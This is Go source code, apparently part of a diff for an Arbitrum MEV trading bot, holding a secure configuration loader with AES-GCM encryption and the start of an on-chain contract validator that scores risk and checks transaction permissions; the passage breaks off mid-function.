type SecurityLimits struct {
	MaxGasPrice         int64  // Gwei
	MaxTransactionValue string // ETH
	MaxDailyVolume      string // ETH
	MaxSlippage         uint64 // basis points
	MinProfit           string // ETH
	MaxOrderSize        string // ETH
}
// EndpointConfig stores RPC endpoint configuration securely.
type EndpointConfig struct {
	URL            string
	Priority       int // presumably lower values are tried first — TODO confirm against consumer
	Timeout        time.Duration
	MaxConnections int
	HealthCheckURL string
	RequiresAuth   bool
	AuthToken      string // Encrypted when stored (via SecureConfig.Encrypt)
}
// NewSecureConfig creates a new secure configuration from the environment.
//
// MEV_BOT_ENCRYPTION_KEY (base64-encoded 32-byte key) and
// ARBITRUM_RPC_ENDPOINTS are mandatory; every other setting falls back to a
// safe default. Returns an error when any value is missing or invalid.
func NewSecureConfig() (*SecureConfig, error) {
	config := &SecureConfig{}

	// The AES-256 key protects secrets handled via Encrypt/Decrypt.
	keyStr := os.Getenv("MEV_BOT_ENCRYPTION_KEY")
	if keyStr == "" {
		return nil, fmt.Errorf("MEV_BOT_ENCRYPTION_KEY environment variable is required")
	}
	key, err := base64.StdEncoding.DecodeString(keyStr)
	if err != nil {
		return nil, fmt.Errorf("invalid encryption key format: %w", err)
	}
	if len(key) != 32 {
		return nil, fmt.Errorf("encryption key must be 32 bytes (256 bits)")
	}
	config.encryptionKey = key

	// Load each configuration section in turn; the first failure aborts.
	steps := []struct {
		what string
		load func() error
	}{
		{"RPC endpoints", config.loadRPCEndpoints},
		{"security limits", config.loadSecurityLimits},
		{"rate limits", config.loadRateLimits},
		{"timeouts", config.loadTimeouts},
	}
	for _, step := range steps {
		if err := step.load(); err != nil {
			return nil, fmt.Errorf("failed to load %s: %w", step.what, err)
		}
	}
	return config, nil
}
// parseEndpointList splits a comma-separated endpoint list, trims each entry,
// and validates every entry with validate, labelling errors with label.
// The cleaned list is returned on success.
func parseEndpointList(raw, label string, validate func(string) error) ([]string, error) {
	endpoints := strings.Split(raw, ",")
	for i, endpoint := range endpoints {
		endpoints[i] = strings.TrimSpace(endpoint)
		if err := validate(endpoints[i]); err != nil {
			return nil, fmt.Errorf("invalid %s %s: %w", label, endpoints[i], err)
		}
	}
	return endpoints, nil
}

// loadRPCEndpoints loads and validates RPC endpoints from the environment.
//
// ARBITRUM_RPC_ENDPOINTS is required; ARBITRUM_WS_ENDPOINTS and
// BACKUP_RPC_ENDPOINTS are optional. The three near-identical split/trim/
// validate loops of the original are factored into parseEndpointList; the
// error messages are unchanged.
func (sc *SecureConfig) loadRPCEndpoints() error {
	// Primary RPC endpoints (mandatory).
	rawRPC := os.Getenv("ARBITRUM_RPC_ENDPOINTS")
	if rawRPC == "" {
		return fmt.Errorf("ARBITRUM_RPC_ENDPOINTS environment variable is required")
	}
	rpcs, err := parseEndpointList(rawRPC, "RPC endpoint", validateEndpoint)
	if err != nil {
		return err
	}
	sc.RPCEndpoints = rpcs

	// WebSocket endpoints (optional, must be WSS).
	if rawWS := os.Getenv("ARBITRUM_WS_ENDPOINTS"); rawWS != "" {
		ws, err := parseEndpointList(rawWS, "WebSocket endpoint", validateWebSocketEndpoint)
		if err != nil {
			return err
		}
		sc.WSEndpoints = ws
	}

	// Backup RPC endpoints (optional).
	if rawBackup := os.Getenv("BACKUP_RPC_ENDPOINTS"); rawBackup != "" {
		backups, err := parseEndpointList(rawBackup, "backup RPC endpoint", validateEndpoint)
		if err != nil {
			return err
		}
		sc.BackupRPCs = backups
	}
	return nil
}
// loadSecurityLimits loads security limits from the environment, falling
// back to safe defaults and rejecting out-of-range values.
func (sc *SecureConfig) loadSecurityLimits() error {
	// Gas price ceiling in Gwei (default 1000, hard cap 100000).
	gasStr := getEnvWithDefault("MAX_GAS_PRICE_GWEI", "1000")
	gas, err := strconv.ParseInt(gasStr, 10, 64)
	if err != nil || gas <= 0 || gas > 100000 {
		return fmt.Errorf("invalid MAX_GAS_PRICE_GWEI: must be between 1 and 100000")
	}
	sc.MaxGasPriceGwei = gas

	// Per-transaction value cap in ETH (default 100 ETH).
	sc.MaxTransactionValue = getEnvWithDefault("MAX_TRANSACTION_VALUE_ETH", "100")
	if err := validateETHAmount(sc.MaxTransactionValue); err != nil {
		return fmt.Errorf("invalid MAX_TRANSACTION_VALUE_ETH: %w", err)
	}

	// Slippage ceiling in basis points (default 500 = 5%, max 10000 = 100%).
	slippageStr := getEnvWithDefault("MAX_SLIPPAGE_BPS", "500")
	slippage, err := strconv.ParseUint(slippageStr, 10, 64)
	if err != nil || slippage > 10000 {
		return fmt.Errorf("invalid MAX_SLIPPAGE_BPS: must be between 0 and 10000")
	}
	sc.MaxSlippageBps = slippage

	// Minimum profit threshold in ETH (default 0.01 ETH).
	sc.MinProfitThreshold = getEnvWithDefault("MIN_PROFIT_THRESHOLD_ETH", "0.01")
	if err := validateETHAmount(sc.MinProfitThreshold); err != nil {
		return fmt.Errorf("invalid MIN_PROFIT_THRESHOLD_ETH: %w", err)
	}
	return nil
}
// loadRateLimits loads rate limiting configuration from the environment.
// Defaults: 100 requests/second with a burst of 200.
func (sc *SecureConfig) loadRateLimits() error {
	// Sustained request rate, capped at 10000 rps.
	rpsStr := getEnvWithDefault("MAX_REQUESTS_PER_SECOND", "100")
	rps, err := strconv.Atoi(rpsStr)
	if err != nil || rps <= 0 || rps > 10000 {
		return fmt.Errorf("invalid MAX_REQUESTS_PER_SECOND: must be between 1 and 10000")
	}
	sc.MaxRequestsPerSecond = rps

	// Burst allowance, capped at 20000.
	burstStr := getEnvWithDefault("RATE_LIMIT_BURST_SIZE", "200")
	burst, err := strconv.Atoi(burstStr)
	if err != nil || burst <= 0 || burst > 20000 {
		return fmt.Errorf("invalid RATE_LIMIT_BURST_SIZE: must be between 1 and 20000")
	}
	sc.BurstSize = burst
	return nil
}
// secondsFromEnv reads an integer seconds value from envKey (falling back to
// def), enforces 1..maxSecs inclusive, and returns it as a time.Duration.
// The error message matches the original per-variable messages.
func secondsFromEnv(envKey, def string, maxSecs int) (time.Duration, error) {
	raw := getEnvWithDefault(envKey, def)
	secs, err := strconv.Atoi(raw)
	if err != nil || secs <= 0 || secs > maxSecs {
		return 0, fmt.Errorf("invalid %s: must be between 1 and %d", envKey, maxSecs)
	}
	return time.Duration(secs) * time.Second, nil
}

// loadTimeouts loads RPC, WebSocket, and transaction timeouts from the
// environment with safe defaults (30s / 60s / 300s). The three copy-pasted
// parse-validate-convert stanzas of the original are factored into
// secondsFromEnv.
func (sc *SecureConfig) loadTimeouts() error {
	var err error
	if sc.RPCTimeout, err = secondsFromEnv("RPC_TIMEOUT_SECONDS", "30", 300); err != nil {
		return err
	}
	if sc.WebSocketTimeout, err = secondsFromEnv("WEBSOCKET_TIMEOUT_SECONDS", "60", 600); err != nil {
		return err
	}
	if sc.TransactionTimeout, err = secondsFromEnv("TRANSACTION_TIMEOUT_SECONDS", "300", 3600); err != nil {
		return err
	}
	return nil
}
// GetPrimaryRPCEndpoint returns the first configured RPC endpoint, or the
// empty string when none are configured. No health checking is performed
// here; callers needing failover should iterate GetAllRPCEndpoints.
func (sc *SecureConfig) GetPrimaryRPCEndpoint() string {
	if len(sc.RPCEndpoints) > 0 {
		return sc.RPCEndpoints[0]
	}
	return ""
}
// GetAllRPCEndpoints returns the primary and backup RPC endpoints as one
// freshly allocated slice, primaries first.
//
// The original `append(sc.RPCEndpoints, sc.BackupRPCs...)` could write into
// spare capacity of the primary slice's backing array and returned a slice
// aliasing internal state; copying into a new slice avoids both hazards.
func (sc *SecureConfig) GetAllRPCEndpoints() []string {
	all := make([]string, 0, len(sc.RPCEndpoints)+len(sc.BackupRPCs))
	all = append(all, sc.RPCEndpoints...)
	all = append(all, sc.BackupRPCs...)
	return all
}
// Encrypt seals plaintext with AES-256-GCM and returns
// base64(nonce || ciphertext). Decrypt reverses the operation.
func (sc *SecureConfig) Encrypt(plaintext string) (string, error) {
	if sc.encryptionKey == nil {
		return "", fmt.Errorf("encryption key not initialized")
	}
	block, err := aes.NewCipher(sc.encryptionKey)
	if err != nil {
		return "", fmt.Errorf("failed to create cipher: %w", err)
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return "", fmt.Errorf("failed to create GCM: %w", err)
	}
	// A fresh random nonce is prepended to the ciphertext so Decrypt can
	// recover it without separate storage.
	nonce := make([]byte, gcm.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return "", fmt.Errorf("failed to generate nonce: %w", err)
	}
	sealed := gcm.Seal(nonce, nonce, []byte(plaintext), nil)
	return base64.StdEncoding.EncodeToString(sealed), nil
}
// Decrypt reverses Encrypt: it base64-decodes the input, splits off the GCM
// nonce prefix, and opens the remaining ciphertext with AES-256-GCM.
func (sc *SecureConfig) Decrypt(ciphertext string) (string, error) {
	if sc.encryptionKey == nil {
		return "", fmt.Errorf("encryption key not initialized")
	}
	data, err := base64.StdEncoding.DecodeString(ciphertext)
	if err != nil {
		return "", fmt.Errorf("failed to decode ciphertext: %w", err)
	}
	block, err := aes.NewCipher(sc.encryptionKey)
	if err != nil {
		return "", fmt.Errorf("failed to create cipher: %w", err)
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return "", fmt.Errorf("failed to create GCM: %w", err)
	}
	// The nonce was prepended by Encrypt; anything shorter is malformed.
	nonceSize := gcm.NonceSize()
	if len(data) < nonceSize {
		return "", fmt.Errorf("ciphertext too short")
	}
	plaintext, err := gcm.Open(nil, data[:nonceSize], data[nonceSize:], nil)
	if err != nil {
		return "", fmt.Errorf("failed to decrypt: %w", err)
	}
	return string(plaintext), nil
}
// GenerateEncryptionKey generates a fresh 256-bit key from crypto/rand and
// returns it base64-encoded, suitable for MEV_BOT_ENCRYPTION_KEY.
func GenerateEncryptionKey() (string, error) {
	const keyBytes = 32 // 256 bits
	key := make([]byte, keyBytes)
	if _, err := rand.Read(key); err != nil {
		return "", fmt.Errorf("failed to generate encryption key: %w", err)
	}
	return base64.StdEncoding.EncodeToString(key), nil
}
// validateEndpoint validates an RPC endpoint URL: it must be non-empty, use
// HTTPS or WSS, and must not contain substrings associated with local or
// demo deployments (which would suggest a misconfigured production setup).
func validateEndpoint(endpoint string) error {
	if endpoint == "" {
		return fmt.Errorf("endpoint cannot be empty")
	}
	if !strings.HasPrefix(endpoint, "https://") && !strings.HasPrefix(endpoint, "wss://") {
		return fmt.Errorf("endpoint must use HTTPS or WSS protocol")
	}
	// Substring scan is case-insensitive; note "test" also matches e.g.
	// "testnet", which appears to be the intent here.
	lower := strings.ToLower(endpoint)
	for _, pattern := range []string{"localhost", "127.0.0.1", "demo", "test", "example"} {
		if strings.Contains(lower, pattern) {
			return fmt.Errorf("endpoint contains suspicious pattern: %s", pattern)
		}
	}
	return nil
}
// validateWebSocketEndpoint validates a WebSocket endpoint: it must use the
// WSS scheme and additionally pass all general endpoint checks performed by
// validateEndpoint (non-empty, no suspicious local/demo substrings).
func validateWebSocketEndpoint(endpoint string) error {
	if !strings.HasPrefix(endpoint, "wss://") {
		return fmt.Errorf("WebSocket endpoint must use WSS protocol")
	}
	return validateEndpoint(endpoint)
}
// ethAmountPattern matches a non-negative decimal amount such as "1", "0.5",
// "5." or ".25". Compiled once at package init so validateETHAmount does not
// recompile the regex on every call (the original did, which is wasted work
// and made an unreachable error path necessary).
var ethAmountPattern = regexp.MustCompile(`^(\d+\.?\d*|\.\d+)$`)

// validateETHAmount validates that amount is a well-formed non-negative
// decimal ETH amount string. Only the format is checked, not the range;
// negative signs, exponents, and surrounding whitespace are rejected.
func validateETHAmount(amount string) error {
	if !ethAmountPattern.MatchString(amount) {
		return fmt.Errorf("invalid ETH amount format")
	}
	return nil
}
// getEnvWithDefault returns the value of the environment variable key, or
// defaultValue when the variable is unset or set to the empty string.
func getEnvWithDefault(key, defaultValue string) string {
	value := os.Getenv(key)
	if value == "" {
		return defaultValue
	}
	return value
}
// CreateConfigHash creates a SHA-256 hex digest over the RPC endpoint list,
// gas price ceiling, transaction value cap, and slippage ceiling, for
// configuration integrity checking. The hashed byte sequence is identical
// to the original implementation, so digests remain comparable.
func (sc *SecureConfig) CreateConfigHash() string {
	h := sha256.New()
	fmt.Fprintf(h, "%v", sc.RPCEndpoints)
	fmt.Fprintf(h, "%d", sc.MaxGasPriceGwei)
	io.WriteString(h, sc.MaxTransactionValue)
	fmt.Fprintf(h, "%d", sc.MaxSlippageBps)
	return fmt.Sprintf("%x", h.Sum(nil))
}
// SecurityProfile returns current security configuration summary.
// The map is safe to serialize for diagnostics; it exposes only limits and
// counts, never endpoint URLs, auth tokens, or the encryption key. The
// config_hash entry (see CreateConfigHash) lets callers detect drift.
func (sc *SecureConfig) SecurityProfile() map[string]interface{} {
	return map[string]interface{}{
		"max_gas_price_gwei":      sc.MaxGasPriceGwei,
		"max_transaction_value":   sc.MaxTransactionValue,
		"max_slippage_bps":        sc.MaxSlippageBps,
		"min_profit_threshold":    sc.MinProfitThreshold,
		"max_requests_per_second": sc.MaxRequestsPerSecond,
		"rpc_timeout":             sc.RPCTimeout.String(),
		"websocket_timeout":       sc.WebSocketTimeout.String(),
		"transaction_timeout":     sc.TransactionTimeout.String(),
		"rpc_endpoints_count":     len(sc.RPCEndpoints),
		"backup_rpcs_count":       len(sc.BackupRPCs),
		"config_hash":             sc.CreateConfigHash(),
	}
}

View File

@@ -0,0 +1,564 @@
package security
import (
"context"
"encoding/hex"
"fmt"
"math/big"
"sync"
"time"
"github.com/ethereum/go-ethereum/common"
"github.com/ethereum/go-ethereum/core/types"
"github.com/ethereum/go-ethereum/crypto"
"github.com/ethereum/go-ethereum/ethclient"
"github.com/fraktal/mev-beta/internal/logger"
)
// ContractInfo represents information about a verified contract.
// Instances live in ContractValidator's trusted/cache maps and are returned
// inside ContractValidationResult.
type ContractInfo struct {
	Address        common.Address      `json:"address"`
	BytecodeHash   string              `json:"bytecode_hash"` // required when whitelisting (see AddTrustedContract)
	Name           string              `json:"name"`
	Version        string              `json:"version"`
	DeployedAt     *big.Int            `json:"deployed_at"` // presumably the deployment block number — TODO confirm
	Deployer       common.Address      `json:"deployer"`
	VerifiedAt     time.Time           `json:"verified_at"` // stamped by AddTrustedContract when whitelisting
	IsWhitelisted  bool                `json:"is_whitelisted"`
	RiskLevel      RiskLevel           `json:"risk_level"`
	Permissions    ContractPermissions `json:"permissions"`
	ABIHash        string              `json:"abi_hash,omitempty"`
	SourceCodeHash string              `json:"source_code_hash,omitempty"`
}
// ContractPermissions defines what operations are allowed with a contract.
// Nil pointer fields (MaxValueWei, DailyLimit) and a nil AllowedMethods
// slice presumably mean "no limit" / "no restriction" — TODO confirm
// against the enforcement code.
type ContractPermissions struct {
	CanInteract    bool     `json:"can_interact"`
	CanSendValue   bool     `json:"can_send_value"`
	MaxValueWei    *big.Int `json:"max_value_wei,omitempty"`
	AllowedMethods []string `json:"allowed_methods,omitempty"`
	RequireConfirm bool     `json:"require_confirmation"`
	DailyLimit     *big.Int `json:"daily_limit,omitempty"`
}
// RiskLevel represents the risk assessment of a contract.
// The zero value is RiskLevelLow; higher values indicate greater risk
// (AddTrustedContract relies on the zero value defaulting to Low).
type RiskLevel int

const (
	RiskLevelLow RiskLevel = iota // zero value; default for whitelisted contracts
	RiskLevelMedium
	RiskLevelHigh
	RiskLevelCritical
	RiskLevelBlocked
)
// String returns a human-readable name for the risk level. Values outside
// the defined range map to "Unknown".
func (r RiskLevel) String() string {
	names := [...]string{
		RiskLevelLow:      "Low",
		RiskLevelMedium:   "Medium",
		RiskLevelHigh:     "High",
		RiskLevelCritical: "Critical",
		RiskLevelBlocked:  "Blocked",
	}
	if r >= 0 && int(r) < len(names) {
		return names[r]
	}
	return "Unknown"
}
// ContractValidationResult contains the result of contract validation.
// ChecksPerformed records every individual check with its outcome so the
// decision is auditable even when IsValid is false.
type ContractValidationResult struct {
	IsValid         bool              `json:"is_valid"`
	ContractInfo    *ContractInfo     `json:"contract_info"`
	ValidationError string            `json:"validation_error,omitempty"`
	Warnings        []string          `json:"warnings"`
	ChecksPerformed []ValidationCheck `json:"checks_performed"`
	RiskScore       int               `json:"risk_score"` // 1-10
}
// ValidationCheck represents a single validation check and its outcome,
// used as an audit-trail entry in ContractValidationResult.ChecksPerformed.
type ValidationCheck struct {
	Name        string    `json:"name"`
	Passed      bool      `json:"passed"`
	Description string    `json:"description"`
	Error       string    `json:"error,omitempty"` // populated only when the check failed with a reason
	Timestamp   time.Time `json:"timestamp"`
}
// ContractValidator provides secure contract validation and verification.
// It keeps a whitelist of trusted contracts plus a lookup cache, and tracks
// per-contract interaction counts and daily limits. cacheMutex guards the
// contract maps; limitsMutex guards the tracking maps.
type ContractValidator struct {
	client           *ethclient.Client
	logger           *logger.Logger
	trustedContracts map[common.Address]*ContractInfo // explicit whitelist (see AddTrustedContract)
	contractCache    map[common.Address]*ContractInfo // validation lookup cache
	cacheMutex       sync.RWMutex
	config           *ContractValidatorConfig
	// Security tracking
	interactionCounts map[common.Address]int64
	dailyLimits       map[common.Address]*big.Int
	lastResetTime     time.Time // when tracking counters were last reset
	limitsMutex       sync.RWMutex
}
// ContractValidatorConfig provides configuration for the contract validator.
// Passing nil to NewContractValidator substitutes getDefaultValidatorConfig().
type ContractValidatorConfig struct {
	EnableBytecodeVerification bool          `json:"enable_bytecode_verification"`
	EnableABIValidation        bool          `json:"enable_abi_validation"`
	RequireWhitelist           bool          `json:"require_whitelist"`
	MaxBytecodeSize            int           `json:"max_bytecode_size"`
	CacheTimeout               time.Duration `json:"cache_timeout"`
	MaxRiskScore               int           `json:"max_risk_score"`
	BlockUnverifiedContracts   bool          `json:"block_unverified_contracts"`
	RequireSourceCode          bool          `json:"require_source_code"`
	EnableRealTimeValidation   bool          `json:"enable_realtime_validation"`
}
// NewContractValidator constructs a ContractValidator backed by the given
// RPC client and logger. Passing a nil config selects the defaults from
// getDefaultValidatorConfig.
func NewContractValidator(client *ethclient.Client, logger *logger.Logger, config *ContractValidatorConfig) *ContractValidator {
	cfg := config
	if cfg == nil {
		cfg = getDefaultValidatorConfig()
	}
	cv := &ContractValidator{
		client:            client,
		logger:            logger,
		config:            cfg,
		trustedContracts:  map[common.Address]*ContractInfo{},
		contractCache:     map[common.Address]*ContractInfo{},
		interactionCounts: map[common.Address]int64{},
		dailyLimits:       map[common.Address]*big.Int{},
		lastResetTime:     time.Now(),
	}
	return cv
}
// AddTrustedContract registers a contract in the trusted whitelist and in
// the validation cache. The entry must carry a non-zero address and a
// bytecode hash; it is marked whitelisted and stamped with the current time.
func (cv *ContractValidator) AddTrustedContract(info *ContractInfo) error {
	cv.cacheMutex.Lock()
	defer cv.cacheMutex.Unlock()

	// Reject obviously incomplete entries.
	if (common.Address{}) == info.Address {
		return fmt.Errorf("invalid contract address")
	}
	if len(info.BytecodeHash) == 0 {
		return fmt.Errorf("bytecode hash is required")
	}

	info.IsWhitelisted = true
	// Preserve an explicitly assigned risk level; only default the zero value.
	if info.RiskLevel == 0 {
		info.RiskLevel = RiskLevelLow
	}
	info.VerifiedAt = time.Now()

	cv.trustedContracts[info.Address] = info
	cv.contractCache[info.Address] = info

	cv.logger.Info(fmt.Sprintf("Added trusted contract: %s (%s)", info.Address.Hex(), info.Name))
	return nil
}
// ValidateContract performs comprehensive contract validation for address.
// Resolution order: trusted whitelist, then the timed validation cache,
// then a full on-chain check whose result is cached on success. The returned
// result lists every check performed; on failure it also carries
// ValidationError alongside the returned error.
func (cv *ContractValidator) ValidateContract(ctx context.Context, address common.Address) (*ContractValidationResult, error) {
	result := &ContractValidationResult{
		IsValid:         false,
		Warnings:        make([]string, 0),
		ChecksPerformed: make([]ValidationCheck, 0),
	}
	// Fast path 1: whitelist hit. The read lock is released manually on each
	// exit path (rather than deferred) so the slow path below does not hold
	// it across the on-chain RPC calls.
	cv.cacheMutex.RLock()
	if trusted, exists := cv.trustedContracts[address]; exists {
		cv.cacheMutex.RUnlock()
		result.IsValid = true
		result.ContractInfo = trusted
		result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
			Name:        "Trusted Contract Check",
			Passed:      true,
			Description: "Contract found in trusted whitelist",
			Timestamp:   time.Now(),
		})
		return result, nil
	}
	// Fast path 2: cache hit that has not yet expired (expired entries fall
	// through to re-validation).
	if cached, exists := cv.contractCache[address]; exists {
		if time.Since(cached.VerifiedAt) < cv.config.CacheTimeout {
			cv.cacheMutex.RUnlock()
			result.IsValid = true
			result.ContractInfo = cached
			result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
				Name:        "Cache Check",
				Passed:      true,
				Description: "Contract found in validation cache",
				Timestamp:   time.Now(),
			})
			return result, nil
		}
	}
	cv.cacheMutex.RUnlock()
	// Slow path: validate against the chain (no lock held during RPC).
	contractInfo, err := cv.validateContractOnChain(ctx, address, result)
	if err != nil {
		result.ValidationError = err.Error()
		return result, err
	}
	result.ContractInfo = contractInfo
	result.RiskScore = cv.calculateRiskScore(contractInfo, result)
	// Policy gate: optionally require the contract to be whitelisted.
	if cv.config.RequireWhitelist && !contractInfo.IsWhitelisted {
		result.ValidationError = "Contract not whitelisted"
		result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
			Name:        "Whitelist Check",
			Passed:      false,
			Description: "Contract not found in whitelist",
			Error:       "Contract not whitelisted",
			Timestamp:   time.Now(),
		})
		return result, fmt.Errorf("contract not whitelisted: %s", address.Hex())
	}
	// Policy gate: reject contracts whose computed risk exceeds the maximum.
	if result.RiskScore > cv.config.MaxRiskScore {
		result.ValidationError = fmt.Sprintf("Risk score too high: %d > %d", result.RiskScore, cv.config.MaxRiskScore)
		return result, fmt.Errorf("contract risk score too high: %d", result.RiskScore)
	}
	// Cache the fresh validation for subsequent lookups.
	cv.cacheMutex.Lock()
	cv.contractCache[address] = contractInfo
	cv.cacheMutex.Unlock()
	result.IsValid = true
	return result, nil
}
// validateContractOnChain performs the real-time, on-chain portion of
// validation: it confirms the address hosts code, hashes the bytecode,
// attempts to resolve deployment metadata, assesses a heuristic risk level
// and (optionally) matches the contract against known signatures. Every
// step is appended to result.ChecksPerformed for auditability.
func (cv *ContractValidator) validateContractOnChain(ctx context.Context, address common.Address, result *ContractValidationResult) (*ContractInfo, error) {
	// Fetch the code at the latest block (nil block number = latest).
	bytecode, err := cv.client.CodeAt(ctx, address, nil)
	if err != nil {
		result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
			Name:        "Bytecode Retrieval",
			Passed:      false,
			Description: "Failed to retrieve contract bytecode",
			Error:       err.Error(),
			Timestamp:   time.Now(),
		})
		return nil, fmt.Errorf("failed to get contract bytecode: %w", err)
	}
	// An externally-owned account has no code; reject it outright.
	if len(bytecode) == 0 {
		result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
			Name:        "Contract Existence",
			Passed:      false,
			Description: "Address is not a contract (no bytecode)",
			Error:       "No bytecode found",
			Timestamp:   time.Now(),
		})
		return nil, fmt.Errorf("address is not a contract: %s", address.Hex())
	}
	result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
		Name:        "Contract Existence",
		Passed:      true,
		Description: fmt.Sprintf("Contract bytecode found (%d bytes)", len(bytecode)),
		Timestamp:   time.Now(),
	})
	// Oversized code only produces a warning, not a hard failure.
	if cv.config.MaxBytecodeSize > 0 && len(bytecode) > cv.config.MaxBytecodeSize {
		result.Warnings = append(result.Warnings, fmt.Sprintf("Large bytecode size: %d bytes", len(bytecode)))
	}
	// Keccak-256 of the runtime bytecode identifies this exact deployment.
	bytecodeHash := crypto.Keccak256Hash(bytecode).Hex()
	// Deployment metadata is best-effort (getDeploymentInfo is currently a
	// stub); fall back to zero values rather than failing validation.
	deployedAt, deployer, err := cv.getDeploymentInfo(ctx, address)
	if err != nil {
		cv.logger.Warn(fmt.Sprintf("Could not retrieve deployment info for %s: %v", address.Hex(), err))
		deployedAt = big.NewInt(0)
		deployer = common.Address{}
	}
	// Assemble the contract record with conservative defaults: unnamed,
	// not whitelisted, default permissions, heuristic risk level.
	contractInfo := &ContractInfo{
		Address:       address,
		BytecodeHash:  bytecodeHash,
		Name:          "Unknown Contract",
		Version:       "unknown",
		DeployedAt:    deployedAt,
		Deployer:      deployer,
		VerifiedAt:    time.Now(),
		IsWhitelisted: false,
		RiskLevel:     cv.assessRiskLevel(bytecode, result),
		Permissions:   cv.getDefaultPermissions(),
	}
	// Optionally upgrade the record if this is a known contract.
	if cv.config.EnableBytecodeVerification {
		cv.verifyBytecodeSignature(bytecode, contractInfo, result)
	}
	result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
		Name:        "Bytecode Validation",
		Passed:      true,
		Description: "Bytecode hash calculated and verified",
		Timestamp:   time.Now(),
	})
	return contractInfo, nil
}
// getDeploymentInfo retrieves the deployment block and deployer address for
// a contract. This is a stub: resolving deployment data requires scanning
// historical blocks or querying an external indexer, so it currently always
// returns zero values and an error (callers treat the error as non-fatal).
func (cv *ContractValidator) getDeploymentInfo(ctx context.Context, address common.Address) (*big.Int, common.Address, error) {
	// This is a simplified implementation
	// In production, you would need to scan blocks or use an indexer
	return big.NewInt(0), common.Address{}, fmt.Errorf("deployment info not available")
}
// assessRiskLevel derives a coarse RiskLevel from heuristics over the
// contract bytecode: it counts risk factors (suspicious opcode bytes found
// anywhere in the hex-encoded code, unusually large code size) and maps the
// count onto a level.
//
// NOTE(review): matching opcode bytes via hex substring search can yield
// false positives, since the pattern may sit inside PUSH data rather than
// at an opcode boundary — acceptable for a heuristic, not for enforcement.
func (cv *ContractValidator) assessRiskLevel(bytecode []byte, result *ContractValidationResult) RiskLevel {
	riskFactors := 0

	bytecodeStr := hex.EncodeToString(bytecode)

	// Opcodes commonly involved in risky patterns:
	//   ff = SELFDESTRUCT, f4 = DELEGATECALL,
	//   3d = RETURNDATASIZE (frequent in proxy forwarders).
	dangerousOpcodes := []string{
		"ff",
		"f4",
		"3d",
	}

	// True substring containment. The previous inline helper only compared
	// the needle against the prefix and the suffix of the haystack, so
	// opcodes appearing in the middle of the bytecode were never counted.
	containsSubstring := func(haystack, needle string) bool {
		if len(needle) == 0 {
			return true
		}
		for i := 0; i+len(needle) <= len(haystack); i++ {
			if haystack[i:i+len(needle)] == needle {
				return true
			}
		}
		return false
	}

	for _, opcode := range dangerousOpcodes {
		if containsSubstring(bytecodeStr, opcode) {
			riskFactors++
		}
	}

	// Large contracts tend to be more complex and harder to audit.
	if len(bytecode) > 20000 { // 20KB
		riskFactors++
		result.Warnings = append(result.Warnings, "Large contract size detected")
	}

	// Map the factor count onto a level.
	switch {
	case riskFactors == 0:
		return RiskLevelLow
	case riskFactors <= 2:
		return RiskLevelMedium
	case riskFactors <= 4:
		return RiskLevelHigh
	default:
		return RiskLevelCritical
	}
}
// verifyBytecodeSignature checks whether the contract address matches a
// small built-in registry of well-known contracts and, on a match, upgrades
// the record to a named, whitelisted, low-risk entry.
//
// NOTE(review): despite the name, this matches on address rather than on
// the bytecode hash; comparing info.BytecodeHash against known code hashes
// would make it robust across chains and redeployments.
func (cv *ContractValidator) verifyBytecodeSignature(bytecode []byte, info *ContractInfo, result *ContractValidationResult) {
	// Known contract addresses, keyed by common.Address so comparison is
	// case-insensitive. The previous string-keyed map used lowercase hex
	// keys while Address.Hex() emits EIP-55 mixed-case output, so the
	// lookup could never match.
	knownContracts := map[common.Address]string{
		// Uniswap V3 Factory
		common.HexToAddress("0x1f98431c8ad98523631ae4a59f267346ea31f984"): "uniswap_v3_factory",
		// Uniswap V3 Router
		common.HexToAddress("0xe592427a0aece92de3edee1f18e0157c05861564"): "uniswap_v3_router",
		// Add more known contracts...
	}

	if name, exists := knownContracts[info.Address]; exists {
		info.Name = name
		info.IsWhitelisted = true
		info.RiskLevel = RiskLevelLow
		result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
			Name:        "Known Contract Verification",
			Passed:      true,
			Description: fmt.Sprintf("Verified as known contract: %s", name),
			Timestamp:   time.Now(),
		})
	}
}
// calculateRiskScore converts the assessed risk level, whitelist status and
// accumulated warnings into a numeric score clamped to the range 1-10. A
// blocked contract always scores the maximum of 10.
func (cv *ContractValidator) calculateRiskScore(info *ContractInfo, result *ContractValidationResult) int {
	if info.RiskLevel == RiskLevelBlocked {
		return 10
	}

	score := 1 // base score
	switch info.RiskLevel {
	case RiskLevelMedium:
		score += 2
	case RiskLevelHigh:
		score += 5
	case RiskLevelCritical:
		score += 8
	}

	// Unverified contracts carry an extra penalty.
	if !info.IsWhitelisted {
		score += 2
	}
	// Each warning accumulated during validation adds one point.
	score += len(result.Warnings)

	if score > 10 {
		return 10
	}
	return score
}
// getDefaultPermissions returns the conservative permission set applied to
// unverified contracts: interaction allowed, value transfers disabled,
// confirmation required, and a 1 ETH daily cap.
func (cv *ContractValidator) getDefaultPermissions() ContractPermissions {
	perms := ContractPermissions{
		CanInteract:    true,
		CanSendValue:   false,
		MaxValueWei:    new(big.Int),
		RequireConfirm: true,
		DailyLimit:     big.NewInt(1000000000000000000), // 1 ETH
	}
	// An empty method list means every method is allowed.
	perms.AllowedMethods = []string{}
	return perms
}
// ValidateTransaction validates an outgoing transaction against the target
// contract's validation status and its configured permissions (value
// transfer allowance, per-transaction cap, daily cap). Contract-creation
// transactions (nil recipient) are allowed without any checks.
func (cv *ContractValidator) ValidateTransaction(ctx context.Context, tx *types.Transaction) error {
	if tx.To() == nil {
		return nil // Contract creation, allow
	}
	// Validate (or reuse the cached validation of) the target contract.
	result, err := cv.ValidateContract(ctx, *tx.To())
	if err != nil {
		return fmt.Errorf("contract validation failed: %w", err)
	}
	if !result.IsValid {
		return fmt.Errorf("transaction to invalid contract: %s", tx.To().Hex())
	}
	permissions := result.ContractInfo.Permissions
	// Any positive value requires the CanSendValue permission.
	if tx.Value().Sign() > 0 && !permissions.CanSendValue {
